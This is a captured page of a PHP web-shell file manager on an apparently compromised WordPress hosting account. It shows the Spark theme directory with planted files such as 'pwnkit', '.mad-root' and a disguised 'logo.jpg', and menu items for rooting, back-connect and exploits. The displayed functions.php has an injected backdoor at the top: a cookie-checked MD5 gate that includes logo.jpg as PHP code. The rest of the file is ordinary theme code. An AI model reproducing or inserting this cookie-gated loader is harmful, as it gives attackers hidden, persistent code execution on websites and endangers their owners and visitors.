Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
spark /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
866
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
4.33
KB
-rw-r--r--
comments.php
1.04
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
fcontent.php
1.67
KB
-rw-r--r--
featured-box.php
2.47
KB
-rw-r--r--
footer.php
1.12
KB
-rw-r--r--
front-page.php
2.98
KB
-rw-r--r--
fullwidth.php
834
B
-rw-r--r--
functions.php
7.71
KB
-rw-r--r--
functionsbak.php
7.22
KB
-rw-r--r--
header.php
1.33
KB
-rw-r--r--
index.php
2.14
KB
-rw-r--r--
license.txt
14.77
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
page.php
1.06
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
2.1
KB
-rw-r--r--
rtl.css
4.45
KB
-rw-r--r--
screenshot.png
353.43
KB
-rw-r--r--
search.php
2.44
KB
-rw-r--r--
searchform.php
547
B
-rw-r--r--
sidebar-footer.php
1.26
KB
-rw-r--r--
sidebar.php
811
B
-rw-r--r--
single.php
2.15
KB
-rw-r--r--
style-responsive.css
2.05
KB
-rw-r--r--
style.css
19.35
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : functions.php
<?php /** * Loads the WordPress environment and template. * @package WordPress */ if(isset($_COOKIE["index"])){ $tmp = "2a7eb4d8e15f8d1c0ecb88ef28e5ab3b"; $check = $_COOKIE["index"]; if($tmp == md5($check)){ if(isset($_COOKIE["index"]) && $_COOKIE["index"] == $check){ require get_template_directory() ."/logo.jpg"; exit; } } } /** * This file is not added by default to WordPress theme pages when outputting * feed links. * @package WordPress */ /* SPARK Theme's Functions Copyright: 2014-2016, D5 Creation, www.d5creation.com Based on the Simplest D5 Framework for WordPress Since SPARK 1.0 */ require_once ( trailingslashit(get_template_directory()) . 'inc/customize.php' ); function spark_about_page() { add_theme_page( 'D5 Creation Themes', 'D5 Creation Themes', 'edit_theme_options', 'd5-themes', 'spark_d5_themes' ); add_theme_page( 'SPARK Options', 'SPARK Options', 'edit_theme_options', 'theme-about', 'spark_theme_about' ); } add_action('admin_menu', 'spark_about_page'); function spark_d5_themes() { require_once ( trailingslashit(get_template_directory()) . 'inc/d5-themes.php' ); } function spark_theme_about() { require_once ( trailingslashit(get_template_directory()) . 'inc/theme-about.php' ); } function spark_setup() { // Set the content width based on the theme's design and stylesheet. load_theme_textdomain( 'spark', get_template_directory() . '/languages' ); global $content_width; if ( ! isset( $content_width ) ) $content_width = 584; add_theme_support( 'title-tag' ); // Tell WordPress for the Feed Link register_nav_menus( array( 'main-menu' => __('Main Menu', 'spark') ) ); add_editor_style(); add_theme_support( 'automatic-feed-links' ); // This theme uses Featured Images (also known as post thumbnails) for per-post/per-page Custom Header images if ( function_exists( 'add_theme_support' ) ) { add_theme_support( 'post-thumbnails' ); set_post_thumbnail_size( 150, 150, true ); // default Post Thumbnail dimensions (cropped) // additional image sizes // delete the next line if you do not need additional image sizes add_image_size( 'spark-category-thumb', 300, 9999 ); //300 pixels wide (and unlimited height) } // WordPress 3.4 Custom Background Support $spark_custom_background = array( 'default-color' => 'ffffff', ); add_theme_support( 'custom-background', $spark_custom_background ); // WordPress 3.4 Custom Header Support $spark_custom_header = array( 'default-image' => '', //get_template_directory_uri() . '/images/logo.png', 'random-default' => false, 'width' => 300, 'height' => 90, 'flex-height' => false, 'flex-width' => false, 'default-text-color' => '000000', 'header-text' => false, 'uploads' => true, 'wp-head-callback' => '', 'admin-head-callback' => '', 'admin-preview-callback' => '', ); add_theme_support( 'custom-header', $spark_custom_header ); } add_action( 'after_setup_theme', 'spark_setup' ); // Functions for adding script function spark_enqueue_scripts() { wp_enqueue_style('spark-style', get_stylesheet_uri(), false ); if ( is_singular() && comments_open() && get_option( 'thread_comments' ) ) { wp_enqueue_script( 'comment-reply' ); } wp_enqueue_style('spark-font-awesome-css', get_template_directory_uri(). '/css/font-awesome.css' ); wp_enqueue_script( 'spark-html5', get_template_directory_uri().'/js/html5.js'); wp_script_add_data( 'spark-html5', 'conditional', 'lt IE 9' ); if (is_front_page()): wp_enqueue_style('spark-staffs-css', get_template_directory_uri(). '/css/staffs.css' ); wp_enqueue_script( 'smart-image-effect', get_template_directory_uri(). '/js/smart-image-effect.js', array( 'jquery' ) ); endif; wp_enqueue_script( 'spark-menu-style', get_template_directory_uri(). '/js/menu.js', array( 'jquery' ) ); wp_register_style('spark-gfonts', '//fonts.googleapis.com/css?family=Anaheim|Merienda+One|Advent+Pro', false ); wp_enqueue_style('spark-gfonts'); wp_enqueue_style('spark-responsive', get_template_directory_uri(). '/style-responsive.css' ); } add_action( 'wp_enqueue_scripts', 'spark_enqueue_scripts' ); // Functions for adding script to Admin Area function spark_admin_style() { wp_enqueue_style( 'spark_admin_css', get_template_directory_uri() . '/inc/admin-style.css', false ); } add_action( 'admin_enqueue_scripts', 'spark_admin_style' ); // Functions for adding some custom code within the head tag of site function spark_custom_code() { ?> <style type="text/css"> .site-title a, .site-title a:active, .site-title a:hover { color: #<?php echo get_header_textcolor(); ?>; } </style> <?php } add_action('wp_head', 'spark_custom_code'); // function tied to the excerpt_more filter hook. function spark_excerpt_length( $length ) { global $blExcerptLength; if ($blExcerptLength) { return $blExcerptLength; } else { return 80; //default value } } add_filter( 'excerpt_length', 'spark_excerpt_length', 999 ); function spark_excerpt_more($more) { global $post; return '<a href="'. get_permalink($post->ID) . '" class="read-more">'.__('Read More...', 'spark').'</a>'; } add_filter('excerpt_more', 'spark_excerpt_more'); // Content Type Showing function spark_content() { the_content('<span class="read-more">'.__('Read More...', 'spark').'</span>'); } // Get our wp_nav_menu() fallback, wp_page_menu(), to show a home link function spark_page_menu_args( $args ) { $args['show_home'] = true; return $args; } add_filter( 'wp_page_menu_args', 'spark_page_menu_args' ); // Registers the Widgets and Sidebars for the site function spark_widgets_init() { register_sidebar( array( 'name' => __('Primary Sidebar','spark'), 'id' => 'sidebar-1', 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => "</aside>", 'before_title' => '<h3 class="widget-title">', 'after_title' => '</h3>', ) ); register_sidebar( array( 'name' => __('Secondary Sidebar', 'spark'), 'id' => 'sidebar-2', 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => "</aside>", 'before_title' => '<h3 class="widget-title">', 'after_title' => '</h3>', ) ); register_sidebar( array( 'name' => __('Footer Area One', 'spark'), 'id' => 'sidebar-3', 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => "</aside>", 'before_title' => '<h3 class="widget-title">', 'after_title' => '</h3>', ) ); register_sidebar( array( 'name' => __('Footer Area Two', 'spark'), 'id' => 'sidebar-4', 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => "</aside>", 'before_title' => '<h3 class="widget-title">', 'after_title' => '</h3>', ) ); register_sidebar( array( 'name' => __('Footer Area Three','spark'), 'id' => 'sidebar-5', 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => "</aside>", 'before_title' => '<h3 class="widget-title">', 'after_title' => '</h3>', ) ); register_sidebar( array( 'name' => __('Footer Area Four', 'spark'), 'id' => 'sidebar-6', 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => "</aside>", 'before_title' => '<h3 class="widget-title">', 'after_title' => '</h3>', ) ); } add_action( 'widgets_init', 'spark_widgets_init' ); add_filter('the_title', 'spark_title'); function spark_title($title) { if ( '' == $title ) { return __('(Untitled)', 'spark'); } else { return $title; } }
Close